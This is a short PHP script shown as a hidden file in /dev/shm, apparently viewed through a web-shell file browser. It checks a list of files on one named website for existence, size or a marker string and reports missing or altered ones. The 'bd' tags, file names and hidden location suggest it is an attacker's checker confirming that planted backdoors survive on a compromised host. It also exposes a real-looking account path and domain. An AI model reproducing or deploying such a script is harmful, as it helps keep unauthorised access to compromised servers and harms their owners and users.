| Current File : //dev/shm/.holder |
<?php $r = '/home/signkpfh/aeroacademy.signature-alg.com'; $x = ["/774274/type.php"=>"bd@@112346638@@approve_request",
"/774274/shSec.php"=>"bd@@112334109@@reverse_searcher",
"/774274/config.php"=>"bd@@112430129@@2200",
"/set.php"=>"bd@@112346933@@service_registry",
"/File.php"=>"bd@@112373559@@1658",
"/catmgr.php"=>"bd@@112399422@@service_registry",
"/last_gallery.php"=>"bd@@112420424@@framework",
"/aeroacademy.php"=>"bd@@112354899@@reverse_lookup",
"/File.php"=>"bd@@112380023@@approve_request",
"/style.php"=>"bd@@112354689@@reverse_searcher",
"/774274/install.php"=>"bd@@112368773@@module_controller",
"/774274/Content.php"=>"bd@@112392860@@616",
"/774274/shortcodes.php"=>"bd@@112201911@@service_registry",
"/last.php"=>"bd@@112430036@@50",
"/catmgr.php"=>"bd@@112392934@@1710",
"/quickqueries.inc.php"=>"bd@@112368615@@settings",
"/774274/show_info.php"=>"bd@@122064076@@1585",
"/774274/Content.php"=>"bd@@122071244@@5",
"/774274/show_info.php"=>"bd@@122071376@@event_handler",
"/774274/picman.php"=>"bd@@122071479@@18",
"/774274/config_add_news.php"=>"bd@@122072020@@79",
"/774274/Content.inc.php"=>"bd@@122072128@@83",
"/774274/config.php"=>"bd@@122072310@@651",
"/style.php"=>"bd@@112150939@@827"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');